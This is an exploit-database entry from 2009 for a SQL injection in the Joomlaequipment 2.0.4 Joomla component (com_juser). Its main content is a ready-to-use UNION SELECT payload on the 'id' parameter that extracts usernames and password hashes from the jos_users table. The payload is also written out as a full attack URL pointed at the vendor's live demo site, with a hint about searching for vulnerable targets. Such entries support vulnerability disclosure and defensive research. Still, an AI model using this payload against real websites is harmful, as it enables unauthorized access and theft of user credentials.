Joomla Component Joomlaequipment 2.0.4 com_juser SQL Injection

2009-06-01T00:00:00
ID EDB-ID:8847
Type exploitdb
Reporter Chip d3 bi0s
Modified 2009-06-01T00:00:00

Description

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection. CVE-2009-2601. Webapps exploit for php platform

                                        
                                                                                                                 
==================================================================================
     Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================

etfffffjtiiiiiiiiiiiiii;,;iitfffffffGGDDDDEW#K;.
if E###################################W######Wi 
iE,K##########################################Wi 
iDtW###########WEftt;;ittLGLEEEKW##############j 
iKD#######WEDft,                ;tDW###########f 
iWW####Kfi.                         iLK########f 
jW###WL                               ,L######Wt 
iW#WL;                        ..        D#####Wi 
iWK,                      tLDDEEj,      ;#####Wi 
f#D                     .G#######Ei      K####E, 
L##        iGDGi.       D#########D.     L####D. 
L##i      tWWWWWL      iKE#########j     i####G. 
tW#i      D#WWKEWj     fDL#########L     .E###L  
iW#j     ;K####W#K;    ;WK######WGKf      G#WWj  
,E#D    .GW#######j     ;L######KGE,     ,E##Wj  
 G#G    .tE#######L   ,Gj,D#####WD;      GWDW#f  
 L#E    ,GK#####KKj  iE#E.,fDEKDj.     ;DWjiWWi  
.G#Wf    ;DW###EED, jW###L    .      .fK#KLfWK;  
,E##Wt     ;fDKKf.  W####Wf         iK#######K;  
iWWL#Ki            ,W#####K,      .f##########f  
;W#;L#WELt,         .ijjji.       f##########Wi  
iWW j#####WDj;,.                 iK##########E.  
;KW,K#########WKDj    ;,      .i.E###########K,  
,ED;W############K;  .DK ;Et  fWtW###########Wi ,
,EL,W#############f  iWG t#f  jWfW###########Wt, 
,Et.E#############L  j#L,L#i  jWfW###########Wj  
,Dj L#############EGDK##LL#f;iDWL############Wj  
,EE.f######################################EEWi  
,EKjf######################################jD#f  
 jWWE#######       [LatinHackTeam]       ##GDWj  
 ,K#################################W######EfWj  
  fEDDEEEEDLLLjtiiiiiiiiiiiitjLLGEEKjK#####WD#G. 
                                   ..ifDKWWWW#L  
                                        ,,;itjt
					 .eCOre


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Author Name   :  Russell...
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Greetz        :  d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group         :  LatinHackTeam
[+] Vulnerability :  SQL injection 
[+] Google Dork   :  imagine ;)
[+] Email         :  chipdebios[alt+64]gmail.com

###################################################



Example:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]